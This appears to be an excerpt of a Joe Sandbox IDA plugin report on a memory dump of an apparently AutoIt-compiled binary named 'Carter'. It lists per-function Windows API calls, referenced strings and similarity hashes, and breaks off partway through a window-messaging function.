Function 00AE4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00AE4C27
gethostname.WSOCK32(?,00000100), ref: 00AE4C41
gethostbyname.WSOCK32(?), ref: 00AE4C4E
_wcscpy.LIBCMT ref: 00AE4C76
_memmove.LIBCMT ref: 00AE4C89
inet_ntoa.WSOCK32(?), ref: 00AE4C94
_strcat.LIBCMT ref: 00AE4CA2
_wcscpy.LIBCMT ref: 00AE4CB9
WSACleanup.WSOCK32 ref: 00AE4CC7
_wcscpy.LIBCMT ref: 00AE4CD5

Strings

0.0.0.0, xrefs: 00AE4C70

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 04f6b3eb3d6217cac5cd006f3cd7da4577806327541091d09b3e640c92960818
Instruction ID: 58fe7ac41c4177cd3c89b18483b0751537cdf81b8907058fe57355a5b157bc8c
Opcode Fuzzy Hash: 04f6b3eb3d6217cac5cd006f3cd7da4577806327541091d09b3e640c92960818
Instruction Fuzzy Hash: 3011E431919118AFDB11BB759D4AEEE77BCDF89710F1441A5F005970D1EFB099C18B90

Function 00AE5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00AE5535

Part of subcall function 00AA083E: timeGetTime.WINMM(?,00000002,00A8C22C), ref: 00AA0842

Sleep.KERNEL32(0000000A), ref: 00AE5561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00AE5585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AE55A7
SetActiveWindow.USER32 ref: 00AE55C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AE55D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00AE55F3
Sleep.KERNEL32(000000FA), ref: 00AE55FE
IsWindow.USER32 ref: 00AE560A
EndDialog.USER32(00000000), ref: 00AE561B

Strings

BUTTON, xrefs: 00AE5599

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 94f59db3d6f5999c31c6442a118367204fcd459abf960a16c46b810fc928186e
Instruction ID: dba5fc382027a19dcd79da0f6c5f5bca5546c01d96bbf36bc17c3cc8f8965694
Opcode Fuzzy Hash: 94f59db3d6f5999c31c6442a118367204fcd459abf960a16c46b810fc928186e
Instruction Fuzzy Hash: F421A178A04684AFEB416F75FD89A7A3B6AFB56349F445019F101831A1CFB18E90DA31

Function 00AEDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

CoInitialize.OLE32(00000000), ref: 00AEDC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AEDCC0
SHGetDesktopFolder.SHELL32(?), ref: 00AEDCD4
CoCreateInstance.OLE32(00B13D4C,00000000,00000001,00B3B86C,?), ref: 00AEDD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AEDD8F
CoTaskMemFree.OLE32(?,?), ref: 00AEDDE7
_memset.LIBCMT ref: 00AEDE24
SHBrowseForFolderW.SHELL32(?), ref: 00AEDE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AEDE83
CoTaskMemFree.OLE32(00000000), ref: 00AEDE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AEDEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00AEDEC3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: c7db71753e2e0a7228a01325bff2382d9ab8f7eb7f92c1d84feca4b4c4c49508
Instruction ID: 652b5b1d63dc317ac7cc9e028d66bcdae65bf95b47358597ad2cb3db93ee8ac3
Opcode Fuzzy Hash: c7db71753e2e0a7228a01325bff2382d9ab8f7eb7f92c1d84feca4b4c4c49508
Instruction Fuzzy Hash: 86B1E975A00109AFDB14EFA5C989DAEBBF9FF88304B148459F906EB261DB70ED41CB50

Function 00AE081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AE0896
SetKeyboardState.USER32(?), ref: 00AE0901
GetAsyncKeyState.USER32(000000A0), ref: 00AE0921
GetKeyState.USER32(000000A0), ref: 00AE0938
GetAsyncKeyState.USER32(000000A1), ref: 00AE0967
GetKeyState.USER32(000000A1), ref: 00AE0978
GetAsyncKeyState.USER32(00000011), ref: 00AE09A4
GetKeyState.USER32(00000011), ref: 00AE09B2
GetAsyncKeyState.USER32(00000012), ref: 00AE09DB
GetKeyState.USER32(00000012), ref: 00AE09E9
GetAsyncKeyState.USER32(0000005B), ref: 00AE0A12
GetKeyState.USER32(0000005B), ref: 00AE0A20

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
Instruction ID: 6a8fb85d9b486da75056955d4c20d7fb509b7a40067e872e83ee3bbb5f2bc478
Opcode Fuzzy Hash: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
Instruction Fuzzy Hash: D851B870A047D829FB35EBB24550BAABFB49F11380F488599D5C2571C3DAE49ACCCBA1

Function 00ADCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00ADCE1C
GetWindowRect.USER32(00000000,?), ref: 00ADCE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ADCE8C
GetDlgItem.USER32(?,00000002), ref: 00ADCE97
GetWindowRect.USER32(00000000,?), ref: 00ADCEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ADCEFD
GetDlgItem.USER32(?,000003E9), ref: 00ADCF0B
GetWindowRect.USER32(00000000,?), ref: 00ADCF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ADCF5F
GetDlgItem.USER32(?,000003EA), ref: 00ADCF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ADCF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00ADCF97

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
Instruction ID: a1d0915670c199780f843d40b73ed8735f2956b82015b6b6941eb7036d55cee9
Opcode Fuzzy Hash: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
Instruction Fuzzy Hash: 4C516271B10205AFDF18DF69CD89AAEBBB6EB88710F54812DF516D7290DBB0AD40CB50

Function 00A823F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A824AF
KillTimer.USER32(-00000001,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00A8254A
DestroyAcceleratorTable.USER32(00000000), ref: 00ABBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC04B
DeleteObject.GDI32(00000000), ref: 00ABC05D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
Instruction ID: 855b56e229e78838ccbc1b551019f69a53ac0c8b04908b493e9c0b83c536cec1
Opcode Fuzzy Hash: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
Instruction Fuzzy Hash: 4361DA30164601DFCB25BF15CD48B7AB7F1FB41322F508929E4824BAA1CBB1AD90DFA0

Function 00A82581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC

GetSysColor.USER32(0000000F), ref: 00A825AF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
Instruction ID: 0677e9830392cd669a9e1d844be19174304c5cffbde23065dee6903d350382a8
Opcode Fuzzy Hash: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
Instruction Fuzzy Hash: B641D331000144AFDB247F289C88BF93B66FB0A331F584265FD669B1E6EB748D81DB21

Function 00A929BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AA0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A92A3E,?,00008000), ref: 00AA0BA7

Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00A92C2C

Part of subcall function 00A93EBE: _wcscpy.LIBCMT ref: 00A93EF6

Part of subcall function 00AA386D: _iswctype.LIBCMT ref: 00AA3875

Strings

Error opening the file, xrefs: 00ACFD33, 00ACFDAA
Unterminated string, xrefs: 00AD00D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ACFD17
AU3!, xrefs: 00A92A93
EA06, xrefs: 00ACFD48
Bad directive syntax error, xrefs: 00AD008F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 616be62f3bc428525080f497d8ecb6ddb56cce0234bfcba433067856a7822df8
Instruction ID: 1874e6b1860507ebccfc4c52fc94275e3d4228f81597712d39478b6c76928b74
Opcode Fuzzy Hash: 616be62f3bc428525080f497d8ecb6ddb56cce0234bfcba433067856a7822df8
Instruction Fuzzy Hash: DD027031208341AFCB24EF24C991EAFBBF5AF99354F10491DF496972A2DB30D949CB52

Function 00AEAEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B10980), ref: 00AEAF4E
GetDriveTypeW.KERNEL32(00000061,00B3B5F0,00000061), ref: 00AEB018
_wcscpy.LIBCMT ref: 00AEB042

Strings

removable, xrefs: 00AEAF80
cdrom, xrefs: 00AEAF6A
all, xrefs: 00AEAF54
network, xrefs: 00AEAFAC
unknown, xrefs: 00AEAFD9
fixed, xrefs: 00AEAF96
ramdisk, xrefs: 00AEAFC2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e2edfb12399c3120126613ac6e1313f29eb4ad6d59d9689410a7e85eb7f2174d
Instruction ID: e5123d016a4c9ac1416e57fe098715c425022d461096a7d9a302712894c5bea9
Opcode Fuzzy Hash: e2edfb12399c3120126613ac6e1313f29eb4ad6d59d9689410a7e85eb7f2174d
Instruction Fuzzy Hash: 6451CC722183469FC710EF15CA91AABB7E5EFA4300F60481DF596472A2EB30ED09CB52

Function 00A84D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00A84D62
__swprintf.LIBCMT ref: 00A84DAC
__i64tow.LIBCMT ref: 00ABDB3B

Strings

False, xrefs: 00ABDB03
%.15g, xrefs: 00A84DA6
True, xrefs: 00ABDAFC
0x%p, xrefs: 00ABDB1D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d1300be563d487e402a7398863e9dece826598339aaa84948e7486728b553892
Instruction ID: 647a189cb234ec2b06067beb98cd595d71b373eb044ca6de6025f06d3c68e0db
Opcode Fuzzy Hash: d1300be563d487e402a7398863e9dece826598339aaa84948e7486728b553892
Instruction Fuzzy Hash: 3941B37160420AAFEB24EF78D941EAA77F8EB49340F20446EE549D7292EB3199418710

Function 00B07777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B0778F
CreateMenu.USER32 ref: 00B077AA
SetMenu.USER32(?,00000000), ref: 00B077B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07846
IsMenu.USER32(?), ref: 00B0785C
CreatePopupMenu.USER32 ref: 00B07866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B07893
DrawMenuBar.USER32 ref: 00B0789B

Strings

0, xrefs: 00B07785
F, xrefs: 00B07887

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
Instruction ID: 8ddbb137d1f5af91eab640bffacb3079460eb9982a7cfa22b7d0da5128e8da6e
Opcode Fuzzy Hash: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
Instruction Fuzzy Hash: 8F413974A00209EFDB10DF65D888A9ABBF5FF49310F1485A9F945A7390DB70AD10CF50

Function 00B07AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B07B83
CreateCompatibleDC.GDI32(00000000), ref: 00B07B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B07B9D
SelectObject.GDI32(00000000,00000000), ref: 00B07BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B07BB0
DeleteDC.GDI32(00000000), ref: 00B07BB9
GetWindowLongW.USER32(?,000000EC), ref: 00B07BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B07BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B07BE3

Strings

static, xrefs: 00B07B1B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
Instruction ID: 627961d14c9548f6b83d428f7812a069ba21897db7c948aa89ee0cd32981bae5
Opcode Fuzzy Hash: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
Instruction Fuzzy Hash: D2318A32104219ABDF11AF64DC49FDB7FA9FF09320F104255FA55A61E0CB75E860DBA0

Function 00AA7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA706B

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

__gmtime64_s.LIBCMT ref: 00AA7104
__gmtime64_s.LIBCMT ref: 00AA713A
__gmtime64_s.LIBCMT ref: 00AA7157
__allrem.LIBCMT ref: 00AA71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71C9
__allrem.LIBCMT ref: 00AA71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71FE
__allrem.LIBCMT ref: 00AA7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA7233
__invoke_watson.LIBCMT ref: 00AA72A4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: b151e5df876914c4745625510b657f1ac2cd7745b371433e9031b2bef797cd9c
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: EF71D272A04716ABDB149F79CD81BAFB7B8AF16320F14422AF514E72C2E774DA448790

Function 00AE2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE2CE9
GetMenuItemInfoW.USER32(00B47890,000000FF,00000000,00000030), ref: 00AE2D4A
SetMenuItemInfoW.USER32(00B47890,00000004,00000000,00000030), ref: 00AE2D80
Sleep.KERNEL32(000001F4), ref: 00AE2D92
GetMenuItemCount.USER32(?), ref: 00AE2DD6
GetMenuItemID.USER32(?,00000000), ref: 00AE2DF2
GetMenuItemID.USER32(?,-00000001), ref: 00AE2E1C
GetMenuItemID.USER32(?,?), ref: 00AE2E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AE2EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EDC

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
Instruction ID: 6ceaef0477b98ad1a0e53d1e87785269083c37a7535ef611175946cd88650505
Opcode Fuzzy Hash: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
Instruction Fuzzy Hash: 7C61AAB0900299AFEF21DF66CD88AEEBFBDEB01304F144559F941A7251DB71AE45CB20

Function 00B07548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B075CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B075CD
GetWindowLongW.USER32(?,000000F0), ref: 00B075F1
_memset.LIBCMT ref: 00B07602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B07614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B0768C

